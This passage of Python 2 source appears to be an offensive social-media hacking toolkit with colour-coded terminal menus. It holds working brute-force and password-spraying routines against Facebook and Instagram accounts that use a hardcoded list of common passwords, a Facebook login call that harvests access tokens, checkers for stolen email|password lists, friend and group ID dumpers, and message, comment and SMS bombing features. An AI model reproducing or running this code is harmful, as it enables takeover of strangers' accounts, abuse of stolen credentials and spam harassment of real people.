  599.                     print SBR + (' SHA-1 Hash : {}').format(hashlib.sha1(raw_input(SGO + ' STRING : ')).hexdigest())
  600.                 elif rchoc == '4' or rchoc == '04':
  601.                     print SBR + (' SHA-256 Hash : {}').format(hashlib.sha256(raw_input(SGO + ' STRING : ')).hexdigest())
  602.                 elif rchoc == '5' or rchoc == '05':
  603.                     print SBR + (' SHA-512 Hash : {}').format(hashlib.sha512(raw_input(SGO + ' STRING : ')).hexdigest())
  604.                 elif rchoc == '6' or rchoc == '06':
  605.                     print SBR + (' Base64 : {}').format(base64.b64encode(raw_input(SGO + ' STRING : ')))
  606.                 else:
  607.                     print SRO + R + ' Invalid Choice !'
  608.  
  609.         elif optc == '2' or optc == '02':
  610.             os.system('clear')
  611.             print ("\n       {}[ Facebook Bruteforcer's ]\n\n     {} 1 : Single Password on ID's List\n     {} 2 : 3 Passwords on ID's List\n     {} 3 : Random Passwords on ID's List\n     {} 4 : WordList Attack \n     {} 5 : Try Single Password on Online Users\n     {} 6 : Go Back <=\n\n     ").format(G, SBG, SBG, SBG, SBG, SBG, SBG)
  612.             while 1:
  613.                 rchoc = raw_input(SGO + ' CHOICE : ')
  614.                 if rchoc == '6' or rchoc == 'back':
  615.                     main(url, '1')
  616.                 if rchoc == '1' or rchoc == '01':
  617.                     try:
  618.                         idfile = open(raw_input(SGO + " ID'S List File : "), 'r').read().split()
  619.                         print SGO + (' Total Accounts : {}').format(len(idfile))
  620.                     except:
  621.                         print SBR + R + ' Invalid File !'
  622.  
  623.                     passw = raw_input(SGO + ' Password To Try On Accounts : ')
  624.                     slist = []
  625.                     for i in range(len(idfile)):
  626.                         slist.append(str(idfile[i]) + '|' + str(passw))
  627.  
  628.                     if len(passw) > 0 and len(slist) > 0:
  629.                         os.system('clear')
  630.                         print SBG + Y + " [BruteForce Result's Would Appear Here]"
  631.                         procx.map(checkl, slist)
  632.                         print xin + SBG + G + ' Saved to hacked.txt :)'
  633.                         print xin + SR + ' Type back to go back'
  634.                 if rchoc == '2' or rchoc == '02':
  635.                     try:
  636.                         idfile = open(raw_input(SGO + " ID'S List File : "), 'r').read().split()
  637.                         print SGO + (' Total Accounts : {}').format(len(idfile))
  638.                     except:
  639.                         print SBR + R + ' Invalid File !'
  640.  
  641.                     passx1 = raw_input(SGO + ' Password  1 : ')
  642.                     passx2 = raw_input(SGO + ' Password  2 : ')
  643.                     passx3 = raw_input(SGO + ' Password  3 : ')
  644.                     print SBR + G + ' These 3 Passwords Would Be Checked on Each Account From List'
  645.                     time.sleep(2)
  646.                     slist = []
  647.                     for i in range(len(idfile)):
  648.                         slist.append(str(idfile[i]) + '|' + str(passx1) + '|' + str(passx2) + '|' + str(passx3))
  649.  
  650.                     if len(slist) > 0:
  651.                         os.system('clear')
  652.                         print SBG + Y + " [BruteForce Result's Would Appear Here]"
  653.                         procx.map(brutefx, slist)
  654.                         print xin + SBG + G + ' Saved to hackedthree.txt :)'
  655.                         print xin + SR + ' Type back to go back'
  656.                 if rchoc == '3' or rchoc == '03':
  657.                     try:
  658.                         idfile = open(raw_input(SGO + " ID'S List File : "), 'r').read().split()
  659.                         print SGO + (' Total Accounts : {}').format(len(idfile))
  660.                     except:
  661.                         print SBR + R + ' Invalid File !'
  662.  
  663.                     print SBR + G + ' Some Common Random Password Would Be Checked On Each'
  664.                     time.sleep(2)
  665.                     commonpass = ['pakistan', '123456', 'facebook', '786786', 'qwertyuiop', '0987654321']
  666.                     slist = []
  667.                     for i in range(len(idfile)):
  668.                         slist.append(str(idfile[i]) + '|' + str(random.choice(commonpass)))
  669.  
  670.                     if len(slist) > 0:
  671.                         os.system('clear')
  672.                         print SBG + Y + " [BruteForce Result's Would Appear Here]"
  673.                         procx.map(checkl, slist)
  674.                         print xin + SBG + G + ' Saved to hacked.txt :)'
  675.                         print xin + SR + ' Type back to go back'
  676.                 if rchoc == '4' or rchoc == '04':
  677.                     try:
  678.                         passfile = open(raw_input(SGO + ' WordList File : '), 'r').read().split()
  679.                         print SGO + (' Total Passwords : {}').format(len(passfile))
  680.                         with open('.a', 'w') as (ax):
  681.                             ax.write(str(len(passfile)))
  682.                     except:
  683.                         print SBR + R + ' Invalid File !'
  684.  
  685.                     acc = raw_input(SGO + ' Account(ID/Email) : ')
  686.                     slist = []
  687.                     for i in range(len(passfile)):
  688.                         slist.append(str(acc) + '|' + str(passfile[i]))
  689.  
  690.                     if len(passfile) > 0:
  691.                         os.system('clear')
  692.                         print SBG + Y + " [BruteForce Result's Would Appear Here]"
  693.                         with open('.b', 'w') as (bx):
  694.                             bx.write('')
  695.                         procx.map(checkw, slist)
  696.                         print xin + SBG + G + ' Saved to hacked.txt :)'
  697.                         print xin + SR + ' Type back to go back'
  698.                 if rchoc == '5' or rchoc == '05':
  699.                     passxd = raw_input(SBG + ' Password to try on Online Users \n' + SGO + ' Password : ')
  700.                     online = []
  701.                     html = BeautifulSoup(s.get(url.format('/buddylist.php')).content, 'html.parser')
  702.                     for i in html.find_all('a'):
  703.                         try:
  704.                             if '/messages/read/?fbid' in i['href']:
  705.                                 online.append(str(i['href']).split('=')[1].split('&')[0])
  706.                         except:
  707.                             pass
  708.  
  709.                     slist = []
  710.                     for i in range(len(online)):
  711.                         try:
  712.                             time.sleep(0.1)
  713.                             sys.stdout.write('\r' + SBR + (' Getting ID :  {}{}').format(G, online[i]))
  714.                             sys.stdout.flush()
  715.                             slist.append(str(online[i]) + '|' + str(passxd))
  716.                         except:
  717.                             pass
  718.  
  719.                     os.system('clear')
  720.                     print SBG + Y + " [BruteForce Result's Would Appear Here]"
  721.                     print SBG + (' ONLINE : {}{}').format(G, len(online))
  722.                     procx.map(checkl, slist)
  723.                     print xin + SBG + G + ' Saved to hacked.txt :)'
  724.                     print xin + SR + ' Type back to go back'
  725.  
  726.         elif optc == '3' or optc == '03':
  727.             os.system('clear')
  728.             print ("\n       {}[ Instagram Bruteforcer's ]\n\n     {} 1 : Single Password on Username's List\n     {} 2 : 3 Passwords on Username's List\n     {} 3 : Random Passwords on Username's List\n     {} 4 : WordList Attack \n     {} 5 : Go Back <=\n\n     ").format(G, SBG, SBG, SBG, SBG, SBG)
  729.             while 1:
  730.                 rchoc = raw_input(SGO + ' CHOICE : ')
  731.                 if rchoc == '5' or rchoc == 'back':
  732.                     main(url, '1')
  733.                 if rchoc == '1' or rchoc == '01':
  734.                     try:
  735.                         idfile = open(raw_input(SGO + " Username's File : "), 'r').read().split()
  736.                         print SGO + (' Total Accounts : {}').format(len(idfile))
  737.                     except:
  738.                         print SBR + R + ' Invalid File !'
  739.  
  740.                     passw = raw_input(SGO + ' Password To Try On Accounts : ')
  741.                     slist = []
  742.                     for i in range(len(idfile)):
  743.                         slist.append(str(idfile[i]) + '|' + str(passw))
  744.  
  745.                     if len(passw) > 0 and len(slist) > 0:
  746.                         os.system('clear')
  747.                         print SBG + Y + " [BruteForce Result's Would Appear Here]"
  748.                         procx.map(icheck, slist)
  749.                         print xin + SBG + G + ' Saved to instahack.txt :)'
  750.                         print xin + SR + ' Type back to go back'
  751.                 if rchoc == '2' or rchoc == '02':
  752.                     try:
  753.                         idfile = open(raw_input(SGO + " Username's File : "), 'r').read().split()
  754.                         print SGO + (' Total Accounts : {}').format(len(idfile))
  755.                     except:
  756.                         print SBR + R + ' Invalid File !'
  757.  
  758.                     passx1 = raw_input(SGO + ' Password  1 : ')
  759.                     passx2 = raw_input(SGO + ' Password  2 : ')
  760.                     passx3 = raw_input(SGO + ' Password  3 : ')
  761.                     print SBR + G + ' These 3 Passwords Would Be Checked on Each Account From List'
  762.                     time.sleep(2)
  763.                     slist = []
  764.                     for i in range(len(idfile)):
  765.                         slist.append(str(idfile[i]) + '|' + str(passx1) + '|' + str(passx2) + '|' + str(passx3))
  766.  
  767.                     if len(slist) > 0:
  768.                         os.system('clear')
  769.                         print SBG + Y + " [BruteForce Result's Would Appear Here]"
  770.                         procx.map(micheck, slist)
  771.                         print xin + SBG + G + ' Saved to instahack.txt :)'
  772.                         print xin + SR + ' Type back to go back'
  773.                 if rchoc == '3' or rchoc == '03':
  774.                     try:
  775.                         idfile = open(raw_input(SGO + ' Username File : '), 'r').read().split()
  776.                         print SGO + (' Total Accounts : {}').format(len(idfile))
  777.                     except:
  778.                         print SBR + R + ' Invalid File !'
  779.  
  780.                     print SBR + G + ' Some Common Random Password Would Be Checked On Each'
  781.                     time.sleep(2)
  782.                     commonpass = ['pakistan', '123456', 'facebook', '786786', 'qwertyuiop', '0987654321']
  783.                     slist = []
  784.                     for i in range(len(idfile)):
  785.                         slist.append(str(idfile[i]) + '|' + str(random.choice(commonpass)))
  786.  
  787.                     if len(slist) > 0:
  788.                         os.system('clear')
  789.                         print SBG + Y + " [BruteForce Result's Would Appear Here]"
  790.                         procx.map(icheck, slist)
  791.                         print xin + SBG + G + ' Saved to instahack.txt :)'
  792.                         print xin + SR + ' Type back to go back'
  793.                 if rchoc == '4' or rchoc == '04':
  794.                     try:
  795.                         passfile = open(raw_input(SGO + ' WordList File : '), 'r').read().split()
  796.                         print SGO + (' Total Passwords : {}').format(len(passfile))
  797.                         with open('.a', 'w') as (ax):
  798.                             ax.write(str(len(passfile)))
  799.                     except:
  800.                         print SBR + R + ' Invalid File !'
  801.  
  802.                     acc = raw_input(SGO + ' USERNAME : ')
  803.                     slist = []
  804.                     for i in range(len(passfile)):
  805.                         slist.append(str(acc) + '|' + str(passfile[i]))
  806.  
  807.                     if len(passfile) > 0:
  808.                         os.system('clear')
  809.                         print SBG + Y + " [BruteForce Result's Would Appear Here]"
  810.                         with open('.b', 'w') as (bx):
  811.                             bx.write('')
  812.                         procx.map(icheck, slist)
  813.                         print xin + SBG + G + ' Saved to instahack.txt :)'
  814.                         print xin + SR + ' Type back to go back'
  815.  
  816.         elif optc == '4' or optc == '04':
  817.             os.system('clear')
  818.             print ("\n       {}[ Facebook Tool's ]\n\n     {} 1 : FriendsList Dump\n     {} 2 : Account Information\n     {} 3 : Group Members ID Dump\n     {} 4 : Account App Status Check\n     {} 5 : Mass Comment Post\n     {} 6 : Accestoken Generate\n     {} 7 : Message to ID's From File\n     {} 8 : Message to All Online Friends\n     {} 9 : Live Account's Checker\n     {} 10 : Message-BOMB (Spam)\n     {} 11 : Checkpoint Detector\n     {} 12 : Go Back <=\n\n     ").format(G, SBG, SBG, SBG, SBG, SBG, SBG, SBG, SBG, SBG, SBG, SBG, SBG)
  819.             while 1:
  820.                 rchoc = raw_input(SGO + ' CHOICE : ')
  821.                 if rchoc == '12' or rchoc == 'back':
  822.                     main(url, '1')
  823.                 if rchoc == '1' or rchoc == '01':
  824.                     limit = raw_input(SGO + ' How Many Pages : ')
  825.                     xurl = []
  826.                     ihtml = BeautifulSoup(s.get(url.format('/profile.php')).content, 'html.parser')
  827.                     for i in ihtml.find_all('a'):
  828.                         if 'friends?lst=' in i['href']:
  829.                             xurl.append(i['href'])
  830.  
  831.                     html = BeautifulSoup(s.get(url.format(xurl[0])).content, 'html.parser')
  832.                     id = []
  833.                     q = 0
  834.                     while q <= int(limit):
  835.                         q = q + 1
  836.                         for i in html.find_all('a'):
  837.                             try:
  838.                                 if '?fref=fr_tab' in i['href']:
  839.                                     sys.stdout.write('\r' + SBR + (" Getting USER's : {} {}  ").format(G, i['href'].split('/')[1].split('?')[0]))
  840.                                     sys.stdout.flush()
  841.                                     id.append(str(i['href'].split('/')[1].split('?')[0]))
  842.                                 if 'unit_cursor=' in i['href']:
  843.                                     html = BeautifulSoup(s.get(url.format(i['href'])).content, 'html.parser')
  844.                             except:
  845.                                 pass
  846.  
  847.                     print xin + SBG + (' Feteched USERS : {}{} ').format(G, len(id))
  848.                     with open('friendlist.txt', 'a') as (fl):
  849.                         fl.write(('\n').join(id))
  850.                     print xin + SBG + G + " Saved USER's to friendlist.txt :)"
  851.                 if rchoc == '2' or rchoc == '02':
  852.                     acct = raw_input(SGO + ' Account ID : ')
  853.                     os.system('clear')
  854.                     try:
  855.                         xhtml = BeautifulSoup(s.get(url.format('/profile.php?id=' + acct)).content, 'html.parser')
  856.                         print xin + SBG + ('NAME :{} {}').format(G, xhtml.title.get_text())
  857.                         print xin + Y + ' [ Other Information ]'
  858.                         n = xhtml.find_all('td')
  859.                         for i in range(len(n)):
  860.                             try:
  861.                                 if n[i]['valign'] == 'top':
  862.                                     print SBG + (' {}{}').format(G, n[i].get_text())
  863.                             except:
  864.                                 pass
  865.  
  866.                         print xin + SR + ' Type back to go back'
  867.                     except:
  868.                         pass
  869.  
  870.                 if rchoc == '3' or rchoc == '03':
  871.                     gi = raw_input(SGO + ' Group ID : ')
  872.                     funx(SBR + " Loading Group ID's Dumper")
  873.                     os.system('clear')
  874.                     idd = [].append(gi + '|' + '0')
  875.                     print xin + G + '       [ GROUP ID DUMP STATUS ]' + xin
  876.                     procx.map(gdump, idd)
  877.                     print SBR + ('Saved to {} groupid.txt').format(G)
  878.                     print xin + SR + ' Type back to go back'
  879.                 if rchoc == '4' or rchoc == '04':
  880.                     print ('\n         {}  [ Select Option ]\n  \n           {} 1 : Active Apps \n           {} 2 : Expired Apps\n      ').format(G, SBG, SBG)
  881.                     rch = raw_input(SGO + ' CHOICE : ')
  882.                     if rch == '1' or rch == '01':
  883.                         oi = 0
  884.                         os.system('clear')
  885.                         print G + '      [ Active Apps ]     '
  886.                         html = BeautifulSoup(s.get(url.format('/settings/apps/tabbed/')).content, 'html.parser')
  887.                         for i in html.find_all('a'):
  888.                             try:
  889.                                 if str(i)[11] == 'd':
  890.                                     if '/settings/applications/details/?app_id' in i['href']:
  891.                                         oi += 1
  892.                                         print G + ('({}){}[{}]').format(oi, W, i.get_text())
  893.                             except:
  894.                                 pass
  895.  
  896.                     if rch == '2' or rch == '02':
  897.                         oi = 0
  898.                         os.system('clear')
  899.                         print G + '      [ Expired Apps ]     '
  900.                         html = BeautifulSoup(s.get(url.format('/settings/apps/tabbed/?tab=inactive')).content, 'html.parser')
  901.                         for i in html.find_all('a'):
  902.                             try:
  903.                                 if str(i)[11] == 'd':
  904.                                     if '/settings/applications/details/?app_id' in i['href']:
  905.                                         oi += 1
  906.                                         print G + ('({}){}[{}]').format(oi, W, i.get_text())
  907.                             except:
  908.                                 pass
  909.  
  910.                     print xin + SR + ' Type back to go back'
  911.                 if rchoc == '5' or rchoc == '05':
  912.                     print SGO + ' Enter Post Link You Want to Comment On'
  913.                     poslink = raw_input(SGO + ' POST Link : ')
  914.                     nuicom = raw_input(SGO + ' Comment : ')
  915.                     nui = raw_input(SGO + ' How Many : ')
  916.                     with open('.com', 'w') as (umes):
  917.                         umes.write(nuicom)
  918.                     alink = []
  919.                     alink.append(poslink)
  920.                     taskc = alink * int(nui)
  921.                     os.system('clear')
  922.                     print G + ' [ STATUS ]\n'
  923.                     procx.map(comment, taskc)
  924.                     print xin + SR + ' Type back to go back'
  925.                 if rchoc == '6' or rchoc == '06':
  926.                     print SRO + ' Enter Email/Password To Generate AcessToken'
  927.                     email = raw_input(SGO + ' Email : ')
  928.                     passwd = raw_input(SGO + ' Password : ')
  929.                     try:
  930.                         actok = get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + passwd + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6').content
  931.                         if 'access_token' in actok:
  932.                             tokn = json.loads(actok)['access_token']
  933.                             print SBG + (' AcessToken : {}{}').format(G, tokn)
  934.                             tfollow(('{}').format(tokn))
  935.                         else:
  936.                             print SBR + ' Incorrect Email/Password'
  937.                     except:
  938.                         print SBR + ' Incorrect Email/Password'
  939.  
  940.                     print xin + SR + ' Type back to go back'
  941.                 if rchoc == '7' or rchoc == '07':
  942.                     acct = open(raw_input(SGO + " ID's File  : "), 'r').read().split()
  943.                     try:
  944.                         print SBG + (" Total ID's : {}{}").format(G, len(acct))
  945.                     except:
  946.                         print SBR + ' Invalid File'
  947.  
  948.                     mes = raw_input(SGO + ' Messaage To Send  : ')
  949.                     with open('.mes', 'w') as (umes):
  950.                         umes.write(mes)
  951.                     os.system('clear')
  952.                     print G + '       [ STATUS ]\n'
  953.                     procx.map(sendmes, acct)
  954.                     print xin + SR + ' Type back to go back'
  955.                 if rchoc == '8' or rchoc == '08':
  956.                     mes = raw_input(SGO + ' Messaage To Send  : ')
  957.                     with open('.mes', 'w') as (umes):
  958.                         umes.write(mes)
  959.                     online = []
  960.                     html = BeautifulSoup(s.get(url.format('/buddylist.php')).content, 'html.parser')
  961.                     for i in html.find_all('a'):
  962.                         try:
  963.                             if '/messages/read/?fbid' in i['href']:
  964.                                 online.append(str(i['href']).split('=')[1].split('&')[0])
  965.                         except:
  966.                             pass
  967.  
  968.                     for i in range(len(online)):
  969.                         try:
  970.                             time.sleep(0.1)
  971.                             sys.stdout.write('\r' + SBR + (' Getting ID :  {}{}').format(G, online[i]))
  972.                             sys.stdout.flush()
  973.                         except:
  974.                             pass
  975.  
  976.                     os.system('clear')
  977.                     print G + '       [ STATUS ]'
  978.                     print SBG + (' Online : {}{}').format(G, len(online))
  979.                     procx.map(sendmes, online)
  980.                     print xin + SR + ' Type back to go back'
  981.                 if rchoc == '9' or rchoc == '09':
  982.                     print SBG + ' Write Each Account in File with This Format'
  983.                     print SBR + ' email | password'
  984.                     acctf = open(raw_input(SGO + ' Accounts File : '), 'r').read().split()
  985.                     print SBG + (' Total Accounts : {}{}').format(G, len(acctf))
  986.                     funx(SBR + ' Analyzing Accounts ')
  987.                     os.system('clear')
  988.                     print G + '       [ LIVE ACCOUNT-STATUS ]\n'
  989.                     procx.map(livept, acctf)
  990.                     print SBG + ' Saved in live.txt'
  991.                     print xin + SR + ' Type back to go back'
  992.                 if rchoc == '10':
  993.                     acct = raw_input(SGO + ' Target ID : ')
  994.                     mes = raw_input(SGO + ' Messaage To Send  : ')
  995.                     amnt = raw_input(SGO + ' How Many ?  : ')
  996.                     acti = []
  997.                     acti.append(acct)
  998.                     totalm = acti * int(amnt)
  999.                     funx(SBR + (' Targeting Message Bomb On User : {}').format(acct))
  1000.                     with open('.mes', 'w') as (umes):
  1001.                         umes.write(mes)
  1002.                     os.system('clear')
  1003.                     print G + '       [ STATUS ]\n'
  1004.                     procx.map(sendmes, totalm)
  1005.                     print xin + SR + ' Type back to go back'
  1006.                 if rchoc == '11':
  1007.                     print SBG + ' Write Each Account in File with This Format'
  1008.                     print SBR + ' email | password'
  1009.                     acctf = open(raw_input(SGO + ' Accounts File : '), 'r').read().split()
  1010.                     print SBG + (' Total Accounts : {}{}').format(G, len(acctf))
  1011.                     funx(SBR + ' Analyzing Accounts ')
  1012.                     os.system('clear')
  1013.                     print G + '       [ CHECKPOINT-STATUS ]\n'
  1014.                     procx.map(checkpt, acctf)
  1015.                     print SBG + ' Saved in checkpoint.txt'
  1016.                     print xin + SR + ' Type back to go back'
  1017.  
  1018.         elif optc == '5' or optc == '05':
  1019.             os.system('clear')
  1020.             print ('\n       {}[ TERMUX TOOLS ]\n\n     {}Make Sure You Installed Termux-Api :)\n        {}${} apt-get install termux-api\n\n     {} 1 : Mass SMS Send\n     {} 2 : Network Status\n     {} 3 : INBOX - Messages\n     {} 4 : Battery Status\n     {} 5 : Scripts Installer\n     {} 6 : Go Back <=\n\n     ').format(G, Y, W, G, SBG, SBG, SBG, SBG, SBG, SBG)
  1021.             while 1:
  1022.                 rchoc = raw_input(SGO + ' CHOICE : ')
  1023.                 if rchoc == '6' or rchoc == 'back':
  1024.                     main(url, '1')
  1025.                 if rchoc == '1' or rchoc == '01':
  1026.                     num = raw_input(SGO + ' Number : ')
  1027.                     mesg = raw_input(SGO + ' Message(SMS) : ')
  1028.                     amnt = raw_input(SGO + ' How Many ? : ')
  1029.                     funx(SBR + ' Preparing System ')
  1030.                     os.system('clear')
  1031.                     print G + '       [ SMS-SENDING-STATUS ]\n'
  1032.                     for i in range(1, int(amnt)):
  1033.                         try:
  1034.                             os.system(("termux-sms-send -n {} '{}' ").format(num, mesg))
  1035.                             print SBG + (' ({}) SMS Sent :)').format(i)
  1036.                         except:
  1037.                             print SBR + (' ({}) SMS Failed :)').format(i)
  1038.  
  1039.                     print xin + SR + ' Type back to go back'
  1040.                 if rchoc == '2' or rchoc == '02':
  1041.                     funx(SBR + ' Getting Network Status ')
  1042.                     os.system('clear')
  1043.                     print G + '       [ NETWORK STATUS ]\n'
  1044.                     try:
  1045.                         netw = os.popen('termux-telephony-deviceinfo').read()
  1046.                         print G + str(netw)
  1047.                     except:
  1048.                         pass
  1049.  
  1050.                     print xin + SR + ' Type back to go back'
  1051.                 if rchoc == '3' or rchoc == '03':
  1052.                     funx(SBR + ' Getting INBOX-Messages')
  1053.                     os.system('clear')
  1054.                     print G + '       [ INBOX-MESSAGES ]\n'
  1055.                     try:
  1056.                         netw = json.loads(os.popen('termux-sms-list').read())
  1057.                         print SBR + (' Total Messages : {}{} \n ').format(G, len(netw))
  1058.                         for i in range(len(netw)):
  1059.                             print SBG + (' ({}) {} [{}]').format(i, G, netw[i]['body'])
  1060.  
  1061.                     except:
  1062.                         pass
  1063.  
  1064.                     print xin + SR + ' Type back to go back'
  1065.                 if rchoc == '4' or rchoc == '04':
  1066.                     funx(SBR + ' Getting Battery Details')
  1067.                     os.system('clear')
  1068.                     print G + '       [ BATTERY-INFORMATION ]\n'
  1069.                     try:
  1070.                         netw = json.loads(os.popen('termux-battery-status').read())
  1071.                         print ('\n               \n              {} PERCENTAGE : {}{}%\n              {} HEALTH : {}{}\n              {} TEMPRATURE : {}{} C\n              {}  STATUS : {}({}/{})\n\n              ').format(SBG, G, netw['percentage'], SBG, G, netw['health'], SBG, G, netw['temperature'], SBG, G, netw['status'], netw['plugged'])
  1072.                     except:
  1073.                         pass
  1074.  
  1075.                     print xin + SR + ' Type back to go back'
  1076.                 if rchoc == '5' or rchoc == '05':
  1077.                     funx(SBR + ' Loading Scripts Installer')
  1078.                     os.system('clear')
  1079.                     print G + '       [ SCRIPTS-INSTALLER ]\n'
  1080.                     print ('\n\n           {} 1) Install FLB\n           {} 2) Install NFD\n           {} 3) Install ASU\n           {} 4) Install NMAP\n           {} 5) Install RED-Hawk\n           {} 6) Install D-Tect\n           {} 7) Install SQL-Map\n           {} 8) Install ReconDog\n           {} 9) Install FIM\n           {} 10) Install MetaSploit\n           {} 0) Go Back\n           \n      ').format(SBR, SBR, SBR, SBR, SBR, SBR, SBR, SBR, SBR, SBR, SBG)
  1081.                     while True:
  1082.                         rx = raw_input(SGO + 'CHOICE : ')
  1083.                         if rx == '1':
  1084.                             flb()
  1085.                         if rx == '2':
  1086.                             NFD()
  1087.                         if rx == '3':
  1088.                             asu()
  1089.                         if rx == '4':
  1090.                             nmap()
  1091.                         if rx == '5':
  1092.                             red_hawk()
  1093.                         if rx == '6':
  1094.                             dtect()
  1095.                         if rx == '7':
  1096.                             sqlmap()
  1097.                         if rx == '8':
  1098.                             reconDog()
  1099.                         if rx == '9':
  1100.                             fim()
  1101.                         if rx == '10':
  1102.                             metasploit()
  1103.                         if rx == '0':
  1104.                             break
  1105.                         else:
  1106.                             print SBR + ' Invalid Option !'
  1107.  
  1108.                     print xin + SR + ' Type back to go back'
  1109.  
  1110.         elif optc == '6' or optc == '06':
  1111.             os.system('clear')
  1112.             print ('\n       {}[ WEB-HACKING TOOLS ]\n\n\n     {} 1 : WEB SHELL Finder\n     {} 2 : IP Locator\n     {} 3 : Website Header\n     {} 4 : Extracts Links From Website\n     {} 5 : Download Images From Site\n     {} 6 : Go Back <=\n\n     ').format(G, SBG, SBG, SBG, SBG, SBG, SBG)
  1113.             while 1:
  1114.                 rchoc = raw_input(SGO + ' CHOICE : ')
  1115.                 if rchoc == '6' or rchoc == 'back':
  1116.                     main(url, '1')
  1117.                 if rchoc == '1' or rchoc == '01':
  1118.                     print SBR + (' Format : {} https://sitename.com').format(G)
  1119.                     webs = raw_input(SGO + ' Website Link : ')
  1120.                     sclist = shellp.split()
  1121.                     print SBR + (" TOTAL SHELL's Database : {}{}").format(G, len(sclist))
  1122.                     funx(SBR + ' Loading Shell Scanner')
  1123.                     os.system('clear')
  1124.                     print G + '      [ SHELL SCANNER RESULT ]' + '\n'
  1125.                     lnks = []
  1126.                     for i in range(len(sclist)):
  1127.                         lnks.append(webs + sclist[i])
  1128.  
  1129.                     procx.map(shellscanner, lnks)
  1130.                     print xin + SR + ' Type back to go back'
  1131.                 if rchoc == '2' or rchoc == '02':
  1132.                     ip = raw_input(SGO + ' IP-Adress : ')
  1133.                     funx(SBR + (' Searching for IP : {}').format(ip))
  1134.                     try:
  1135.                         os.system('clear')
  1136.                         r = get(('http://extreme-ip-lookup.com/json/{}').format(ip)).content
  1137.                         print G + '    [ IP-Location Status ]\n'
  1138.                         print r
  1139.                     except:
  1140.                         print SBR + ' Network Error'
  1141.  
  1142.                     print xin + SR + ' Type back to go back'
  1143.                 if rchoc == '4' or rchoc == '04':
  1144.                     print SBR + (' Format : {} https://sitename.com').format(G)
  1145.                     webs = raw_input(SGO + ' Website Link : ')
  1146.                     wurl = str(webs) + '{}'
  1147.                     funx(SBR + (' Scanning for links in {}{}').format(G, webs))
  1148.                     os.system('clear')
  1149.                     print '     [ Links Scanner Status ]'
  1150.                     try:
  1151.                         r = get(webs).content
  1152.                         html = BeautifulSoup(r, 'html.parser')
  1153.                         try:
  1154.                             for i in html.find_all('a'):
  1155.                                 try:
  1156.                                     print SBG + Y + ' ' + wurl.format(i['href'])
  1157.                                 except:
  1158.                                     pass
  1159.  
  1160.                             for i in html.find('a'):
  1161.                                 try:
  1162.                                     print SBG + Y + ' ' + i['src']
  1163.                                 except:
  1164.                                     pass
  1165.  
  1166.                         except:
  1167.                             pass
  1168.  
  1169.                     except:
  1170.                         print SBR + ' Network Error or Invalid URL'
  1171.  
  1172.                     print xin + SR + ' Type back to go back'
  1173.                 if rchoc == '5' or rchoc == '05':
  1174.                     print SBR + (' Format : {} https://sitename.com').format(G)
  1175.                     webs = raw_input(SGO + ' Website Link : ')
  1176.                     wurl = str(webs) + '{}'
  1177.                     imglink = []
  1178.                     funx(SBR + (' Scanning for Images in {}{}').format(G, webs))
  1179.                     os.system('clear')
  1180.                     print G + '     [ Images Scanner Status ]'
  1181.                     try:
  1182.                         r = get(webs).content
  1183.                         html = BeautifulSoup(r, 'html.parser')
  1184.                         try:
  1185.                             for i in html.find_all('img'):
  1186.                                 try:
  1187.                                     print SBG + Y + ' ' + str(i['src'])
  1188.                                     if 'http' not in str(i['src']):
  1189.                                         imglink.append(wurl.format(str(i['src'])))
  1190.                                     else:
  1191.                                         imglink.append(str(i['src']))
  1192.                                 except:
  1193.                                     pass
  1194.  
  1195.                         except:
  1196.                             pass
  1197.  
  1198.                         print SBG + (' TOTAl IMAGES FOUND : {}{}').format(G, len(imglink))
  1199.                         funx(SBR + G + ' Downloading Images')
  1200.                         if not os.path.exists('web'):
  1201.                             os.mkdir('web')
  1202.                         for i in range(len(imglink)):
  1203.                             try:
  1204.                                 sys.stdout.write(('\r{} Downloading.. ({}/{}) IMAGES').format(SBG, i + 1, len(imglink)))
  1205.                                 sys.stdout.flush()
  1206.                                 try:
  1207.                                     r = get(imglink[i]).content
  1208.                                     with open('web/' + str(imglink[i].split('/')[(-1)]), 'w') as (iwr):
  1209.                                         iwr.write(r)
  1210.                                 except:
  1211.                                     pass
  1212.  
  1213.                             except:
  1214.                                 pass
  1215.  
  1216.                         print xin + SBG + ' Downloaded to web folder :) '
  1217.                     except:
  1218.                         print SBR + ' Network Error or Invalid URL'
  1219.  
  1220.                     print xin + SR + ' Type back to go back'
  1221.  
  1222.         elif optc == '7' or optc == '07':
  1223.             os.system('clear')
  1224.             print ("\n       {}[ BOT's Menu ]\n\n     {} 1 : Facebook Messages Show\n     {} 2 : Facebook Messages Custom Reply\n     {} 3 : Try Password on Each Message Sender\n     {} 4 : Go Back <=\n\n     ").format(G, SBG, SBG, SBG, SBG, SBG, SBG)
  1225.             while 1:
  1226.                 rchoc = raw_input(SGO + ' CHOICE : ')
  1227.                 if rchoc == '4' or rchoc == 'back':
  1228.                     main(url, '1')
  1229.                 if rchoc == '100' or rchoc == '02':
  1230.                     print SBR + ' Put Accounts in File like email|password'
  1231.                     try:
  1232.                         em = open(raw_input(SGO + ' Accounts File : '), 'r').read().split()
  1233.                     except:
  1234.                         print SBR + ' Invalid File'
  1235.  
  1236.                     lnk = raw_input(SGO + ' Post Link : ')
  1237.                     mex = raw_input(SGO + ' Comment : ')
  1238.                     print SBG + (' Total Accounts : {}{}').format(G, len(em))
  1239.                     pathx = []
  1240.                     for i in range(len(em)):
  1241.                         pathx.append(('{}@{}').format(lnk, em[i]))
  1242.  
  1243.                     with open('.com', 'w') as (umes):
  1244.                         umes.write(mex)
  1245.                     funx(SBR + ' Loading BoT')
  1246.                     os.system('clear')
  1247.                     print G + '      [ Comments Status ]'
  1248.                     procx.map(ecomment, idps)
  1249.                 if rchoc == '1' or rchoc == '01':
  1250.                     oldmes = []
  1251.                     funx(SBR + ' Loading BOT Configuration ')
  1252.                     os.system('clear')
  1253.                     print G + '     [ Incomming Messages ]' + xin
  1254.                     while True:
  1255.                         try:
  1256.                             o = BeautifulSoup(s.get(url.format('/messages')).content, 'html.parser').find_all('h3')
  1257.                             if o[1].get_text() not in oldmes:
  1258.                                 print ('{} > {} [ {} ]').format(SBG, G, o[1].get_text())
  1259.                                 oldmes.append(o[1].get_text())
  1260.                         except:
  1261.                             pass
  1262.  
  1263.                 if rchoc == '2' or rchoc == '02':
  1264.                     oldmes = []
  1265.                     message = raw_input(SGO + ' Custom Reply Message : ')
  1266.                     funx(SBR + ' Loading Custom Reply BOT ')
  1267.                     os.system('clear')
